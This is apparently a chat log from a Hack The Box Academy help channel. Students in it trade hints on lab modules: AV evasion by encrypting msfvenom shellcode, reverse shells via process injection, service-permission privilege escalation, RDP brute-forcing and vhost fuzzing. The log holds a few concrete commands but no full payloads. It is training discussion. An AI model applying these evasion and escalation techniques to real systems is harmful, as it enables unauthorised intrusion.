I'm going to have to go through this again tomorrow. Brain is soup. Thanks for the help though.
as long as you pace yourself and recognize when you might need a break, you'll be fine
my general rule of thumb is if i'm starting to get unreasonably frustrated at myself over small mistakes
I'm taking a very brazen trial by fire approach, so I'm learning all of the commands, syntax, etc. on top of the methodology. If it's not one issue, it's another, lol. At least for now. This was only my second box.
I would like to ask if you can turn on the target machine?
It says it's spawning you have to wait
I waited very long and cleared the cookie as well, and this target machine still doesn't turn on
Close the browser and go to it again and try to re spawn it. If that doesn't work, and it never spawns, contact support
Thanks, your approach is very effective
Hi. I need a little bit of help in the module Using Web Proxies - ZAP Scanner.
How much time does it take ZAP to start searching for vulnerabilities? It's not starting for me. It has been 15 minutes without starting to scan the website.
Is the website in your /etc/hosts?
Did you specify the port?
The scan itself can take upwards of 30 minutes or more
I added the IP at the bottom:
127.0.0.1 localhost
127.0.1.1 debian12-parrot
# The following lines are desirable for IPv6 capable hosts
::1 localhost ip6-localhost ip6-loopback
ff02::1 ip6-allnodes
ff02::2 ip6-allrouters
127.0.0.1 localhost
127.0.1.1 htb-zmp5gtt1ja htb-zmp5gtt1ja.htb-cloud.com
94.237.59.199:35862
Is it ok like to add it this way?
That's completely incorrect
Huh
You don't include the port in your /etc/hosts, you also didn't put the domain
You specify the port in the connection string http://domain:port
Whats the, "htb-zmp5..." Line?
Pwnbox
Oh
94.237.59.199 a.root-servers.net nstld.verisign-grs.com
Ok thanks i fixed it this way
That's not correct either
It should be 94.237.59.199 <Domain>
Did you not get given a vhost for this section?
That's what you put next to the IP
If not then you don't need an /etc/hosts entry
You just put the http://ip:port in the zap scanner using the spider option
screenshots would help
This wouldn't fix it btw, since you don't have/need a vhost for this
The hosts file is a local DNS
@trail sail btw: whenever you're given a public_ip:port, the only scope is that port and any vhosts you may discover if needed
The info you put there is just the info brought up via public name servers which are irrelevant to that ip
Ok, I don't understand anything right now. I'll call it a day and continue with this module tomorrow. Thank you, everyone. Have a good one.
My point; you can delete that entry and it would work just fine
Thanks!
SQLmap is an amazing tool
Start with information Security foundation path
That will get you familiar with a lot of the basics
If you wanna do the cpts you'll need to do the pentester path, the information Security Foundations path is a pre-requisite to that
Htb is not free
There is the student plan which is $8/month and gives you access to the whole course
But it is well worth it
YouTube is free, and I believe PortSwigger Academy is free. But HTB is incredibly cheap, especially for what it is.
You just need to be an active student in Uni
i still recommend HTB if you can.
The tier 0 modules are free
As in they refund the cubes you pay for them fully
All other module tiers give back 20%
alsonotmalware.exe
fret not, it is also not malware
I've completed it, the module won't steer you wrong
Anyone completed this below :
Module: Information Gathering - Web Edition
Section: Skill Assessment
Question: "After crawling the inlanefreight.htb domain on the target system, what is the email address you have found? Respond with the full email, e.g., mail@inlanefreight.htb."
I am stuck, can someone give me a hint please.
The payload works on my local machine, do I have to spawn calc.exe as it kills itself after spawning win32calc.exe ?
I'm currently spawning notepad.exe instead
On phone, give me a moment to spin up my notes
How can I upload photo on this group?
read #welcome
This channel
Read #welcome so you can get instructions and eventually you can upload photos
INTRODUCTION TO DIGITAL FORENSICS
Evidence Acquisition Techniques & Tools
Visit the URL "https://127.0.0.1:8889/app/index.html#/search/all" and log in using the credentials: admin/password. After logging in, click on the circular symbol adjacent to "Client ID". Subsequently, select the displayed "Client ID" and click on "Collected". Initiate a new collection and gather artifacts labeled as "Windows.KapeFiles.Targets" using the _SANS_Triage configuration. Lastly, examine the collected artifacts and enter the name of the scheduled task that begins with 'A' and concludes with 'g' as your answer.
I did as described, downloaded the artifacts but can't find a process which starts with A and ends with G.
Could somebody please give a hint?
I tried spawning calc.exe instead and it worked on my local machine but not on the target machine
Are you using CreateProcess
yes
did you read this bud
#modules message
oh sorry I just read it, and yea the problem was that apparently the project is compiling in 32bit which causes it to spawn a notepad.exe in 32bit (for some reason)
and after I changed the compile configuration to 64bit, then it spawns notepad.exe in 64bit
did you update your code to use C:\\Windows\\System32\\calc.exe ?
yes, and it worked on my local machine (spawn calc.exe and got reverse shell)
thats why I was suspecting that the module target box just isn't triggering the binary, but gubarz said he has completed the module so Idk
go me, I don't know what I did with my original code, but rebuilding the solution it's not triggering for me from alpha
maybe the current version of the target box is messed up for "ProcessInjection" part ???
my original exe that is known working isn't updating the log either
Unless they changed it in the last 24 hours
As he said he just tested it yesterday
who is he?
he said it before that he hasn't done the module
He could have done that section but not finished the module
He said that he tested the payload and it worked with minimal modifications
but if you're sure the lab is broken #1234357888114364508 exists ¯_(ツ)_/¯
yea the log seems to be stuck on 5th July
About the padding oracle attack in the HTTPS/TLS module, I tried all possible block sizes and the recovered plaintext is gibberish
yeah seems like the checking task is broken
just posted an issue in erratum so let's hope someone will get it fixed ASAP
gonna skip that section for now
any idea what encryption is this
I usually try ASCII and/or base64
need help with this
I just tested all the other payloads for the other sections and they are all working except for that one :/
oh bruh nvm i made a typo and gave wrong error argument
That’s not allowed but ok
@languid fjord <----
Wow that complete domain compromise on AD Skills Assessment 2 was a whirlwind and incredibly fun!
Happy to be done with that
I would like to speak to someone for the following module:
Name: INTRODUCTION TO WINDOWS EVASION TECHNIQUES
Section: Skills Assessment #2
thank you
Just ask your question
Well I am able to create a reverse shell with my poc.vbs in the dev machine and also on the victim machine. However when the vbs is triggered by the bot it is not creating the reverse shell. When I look into the log.txt, I can see a timeout which might suggest an issue with the bot.
Do I need to raise a ticket?
Hi, I'm currently doing the "Weak Permissions" section under the Windows Privilege Escalation module. I modified the bin path of the vulnerable Windscribe service and was able to add myself to the Administrators group. And yet, I cannot read the flag on the Administrators desktop (shows Access Denied). I tried the commands takeown /f C:\Users\Administrator\WeakPerms\flag.txt and icacls C:\Users\Administrator\WeakPerms\flag.txt /grant htb-student:F to no avail. Any help?
Did you update gpo then log out and back in
GPO? Not sure what that is sorry
By that I mean literally using the start menu and logging out then in again
Ah ok let me try that
@fathom pendant any chance you can help me out on that one?
Haven't done this module so I can't
Nope, doesn't help
I solved both of those a different way, may not be convenient or the intended as far as the module goes, but there are other ways to get the flags that don't require popping a shell.
Did you sign out or just close the rdp
Did you also run powershell as admin after logging back in?
thanks mate, can I DM you?
I did try this though
sure
Yeah you need to sign out then back in for it to take effect
Not just end session
It's just how permissions in general work, because the user is currently active windows can't actively assign it a new group
It's queued up
Makes sense
What is the best way to report grammar corrections? About 50% of pages have subtle ESL errors.
Is it normal that bruteforcing RDP credentials with crackmapexec is extremely slow? It's like 20 seconds per try, while I get around 10 per second with SMB or SSH
From what I remember, yes. I can't remember if you can adjust threads for faster attempts?
crowbar goes fast
is that a tool
but given the nature of the service, i doubt rdp would expect a lot of connections .... i remember using smb being the quickest
alright thanks
thanks
How do I install crackmapexec on Parrot OS? Nothing is working. I've tried sudo apt-get -y install crackmapexec, pipx install, python3, installing the GitHub repo with recursive didn't even work either
Good day! I have a question about the monthly subscription on Hack The Box. If I subscribe to the Platinum plan, which costs around $68, do I receive 1,000 cubes? If so, after using these cubes to purchase modules, do I retain access to these modules for life, or do I lose them once the monthly subscription ends?
I know you keep any modules you complete
A question for the team. I'm trying to run netcat to listen on port 80. I run as sudo, but it's still refusing. I also have a few versions of netcat installed. Any suggestions on how to fix this?
Crackmap isnt being maintained anymore. Use
https://www.netexec.wiki/ instead. Same features or even better
And I've been sat here for an hour trying everything but nothing said it wasn't being maintained anymore 🤣. I thought since there was a module all about CME it still was maintained
Or if you really want to use crackmap then use pwnbox. Its installed on the pwnbox
took me a while to figure it out too. i just use netexec now
It might be because port 80 is taken by your webserver? Run netstat -tulpn and check if port 80 is already taken
Oh good idea. I rage quit and shut down my computer, so I'll check in the morning when I log on
In general, I've had a few issues with getting nc to behave how it does on pwnbox.
Will do!
Module: Active Directory Enumeration and Attacks
Section: Skills Assessment Part 1
After logging into the target using the web shell, I can't import the ActiveDirectory PowerShell module. I'm NT AUTHORITY\SYSTEM on the target.
I used the following command to try to import the module.
Import-Module ActiveDirectory
I received no errors or output. I then ran the Get-Module command to see if it was imported, but it wasn't. I tried the Get-ADDomain cmdlet but it didn't work.
What am I missing?
That webshell creates a new session for every command, I believe it's mentioned somewhere in the module
The web shell they provided in the assessment?
Also, one more piece of info, I established a reverse shell using that web shell to my attack host so I can have CLI access.
But I tried importing the PowerShell module from both and it didn't work.
you should be able to import stuff with the revshell
yes
Didn't work.
Huh... I didn't see that mentioned, still don't.
Maybe I'll try resetting the target and see.
you can use Install-WindowsFeature RSAT-AD-PowerShell but you don't need the AD module to answer the questions
Anyone that completed the Sliver module? I am on the last question of the module but don't know how to solve it.
Information Gathering - Web Edition - Skills Assessment (updated) - Last Question
I'm using the following to enumerate subdomains and getting nothing. Could someone take a look at my cmd and vhost file and tell me what I'm missing?
└─$ ffuf -w /usr/share/seclists/Discovery/DNS/subdomains-top1million-110000.txt:FUZZ -u http://94.237.63.97:51508 -H 'Host: FUZZ.inlanefreight.htb' -fs 120
vhost file snippet (have tried with and without the port). Not sure which one would be correct since they both produce the same result.
94.237.63.97:51508 inlanfreight.htb
94.237.63.97 inlanefreight.htb
would someone point me in the right direction?
don't put port number in the host file, the second one is correct
That is what I thought but then I changed it to include the port. Thanks for clearing that up. But I still get no valid subdomains when enumerating. What would you do next or have you solved this module and can give me a tip to solve this last question?
the command is correct, what output are you getting in ffuf
read #welcome so your message doesn't get removed by the bot
and also make sure the filter size is correct
@next bronze when I filter out a response size of 120 I get nothing; otherwise, I get a status of 200 and a response size of 120 for every domain
seems like 120 is correct then, you get nothing because it's filtering out the wrong vhosts, let it finish fuzzing
@next bronze have you done the module digital forensic?
alright 🙂
@timber hatch make sure you have selected "Sparse files will be expanded in export" when preparing the download, otherwise you'll end up with a very small download containing only metadata
I just completed the Windows Event Logs & Finding Evil module, however the Skill assessment I ended up just manually looking through the logs and just filtering. I am not sure this is the best way or most efficient way to do this. Other than the sans material are there any other places to gain more of an understanding of the topic? thanks
I was able to find one subdomain but still cant seem to find the API key. what would you do to try to scrape the API key? I have already tried running reconspider against that subdomain
spoilers, also that's http and not https, also you can ffuf more
@next bronze sorry, will try that
is the key to the ETW module the more you mess bout with it the more you'll understand it?
I need a sanity check. I'm doing the new Fingerprinting module. I added the 2 hosts with the IP to my hosts file, but I can't resolve the hosts. Am I missing something:
Are you connected to the vpn?
yup
Are you using http?
I tried in the browser with http, I tried curl, nothing works
Anyone recently worked on Attacking Applications, Splunk module? I would need some help with it.
Reset the target and then put in the new ip then
Did so twice. I downloaded a new VPN file and reset again. Maybe 3 times the charm
To clarify you're using your own vm yeah?
And you don't have the in-browser pwnbox running yeah?
OK maybe it had to do with the maintenance on the vpns. with the new file it worked. Sorry for bothering you
Fingerprinting section btw, not module
Yeah true. Thanks for the help
Section done, was just technical problem with the VPN
I'm working on the API Attacks module on Hack The Box Academy. It's a really great module, but I'm stuck on one question despite solving the rest. Can anyone help me with the solution for 'Submit the header and its value that expose another Security Misconfiguration in the API?'
Hello, I need help with the malware development module. Stuck on task one, got my exe ready, encrypted with AES and stuff, but it gets detected on the Alpha machine and gets deleted instantly
Anyone recently worked on Attacking Applications, Splunk module? I would need some help with it.
An article was linked in the text. Read this article and you will probably know what you are looking for
saved me so much time, thanks @fathom pendant
any ideas?
section?
INTRODUCTION TO WINDOWS EVASION TECHNIQUES: Static Analysis
that aes encryption is definitely effective, did you encrypt it right?
if it gets detected instantly without even being executed it usually means your shellcode signature is still in the program
it's not the shellcode that's causing the problem, no matter how you generated it with msfvenom it will get detected, it's how you're encrypting it in your program
Which article? I've already tried almost everything in the articles. I've been trying to solve it for hours.
I followed the steps as in tutorial: cyberchef from hex to AES to base64
Three articles are linked in the HTTP Headers section
the technique does evade defender static analysis so you're doing something wrong here
The answer is in the section really. You just need to differentiate between when and what an HTTP server will respond with depending on the HTTP methods you invoke at it. You shall find more details here https://owasp.org/www-project-secure-headers/index.html, specifically, "Best Practices".
okay solved it, i was uploading the wrong file all the time...
thx for your attention
Can I send you a DM?
Absolutely
Question: List the SID associated with the user account Jim you created
Module: Windows Fundamentals
Section: Skills Assessment: Windows Fundamentals
I'm pretty sure i followed the steps and I got the supposed SID but they are telling me the answer is incorrect. Any ideas?
Hi, I am working on the Linux Privilege Escalation module, Environment enumeration section. Stuck on the 'Enumerate the Linux environment and look for interesting files that might contain sensitive data. Submit the flag as the answer.' Used grep, but as user htb-student wasn't able to see the result. How can I escalate the privileges to user lab_adm ?
Hello, is anybody facing issues with RDP connections? In the Malware Analysis module I'm getting a "timeout - waiting for activation" error from xfreerdp. I tried resetting the VPN and the target a couple of times
That ping doesn't work
thank god
what
You can't @ everyone
It literally does not go through
Only mods/admin/staff have that privilege
Okay
I did XPath a while ago
@fathom pendant
Ohh
I haven't done this module
Why are you always here and there 😂
But it helps others help you if you describe the issue you're facing
@fathom pendant Because literally I'm always in this server and come to face you, but thanks, you help a lot!
I found the correct answer. Thank you so much. @kind turret @acoustic owl
so @hot owl what is your query about the module
Anyone got a list of tools and their functionalities? Too many tools and I keep forgetting them....
@storm elk I am facing an issue at the end of the section where we put the payload in the q parameter in the search section and set the f parameter. How do I set the f parameter to ../../..//text()
e.g. crackmapexec, smbexec and psexec, why are there so many exec tools... AHAHAHA I can't rmb
True
???
@clever topaz But you should write them in notes.
which section exactly
XPath - Data Exfiltration
I know, but I forgot to note them down already, there are too many of them
And I just realised crackmapexec is able to enum SMB, so I wonder about the need for smbexec
Great for gathering information about a target.
Are you using Burp?
because it is literally just putting your XPath in the parameter?
Yea
But I can’t figure it out.
you search for something, capture the request, send to repeater and append the f parameter?
it explains exactly what you need to do in the module via the screenshots
as for the question, it will require some testing
what's the last single digit
huh?
Thanks mate
Let me dig in!
let me know if you need any more help
what's the last digit of your answer
6
that should be correct, make sure you've copied the whole thing correctly and there's no space in your answer
I’m on the “Cracking into Hack the Box” path, on the getting started module, section 18 “Nibbles - Privilege Escalation” I’ve put the one liner into the monitor.sh file, after running the LinEnum.sh script on the target machine, but it’s still making me put in a password for the “nibbler” account
let me check
nah, didn't work
Use the full path
As in /home/nibbler/personal/stuff/monitor.sh? Because I did and for some reason does not work which makes zero sense, but let me try again that’s how this stuff always works lol
With sudo?
Yes with sudo, I doubt I have to be in a different working directory? Idk what that would change
Guys, I'm having trouble in the Attacking Common Services - Easy lab. I could not find any users using smtp-user-enum with the provided user list. I have tried all other vectors with no luck, any idea what to do?
@next bronze thanks, I was able to get it.
That shouldn't change anything
You need to increase the wait time
20-25 seconds generally works
Lovely, thanks a lot. so by adding -w 25
It's a slow service so yeah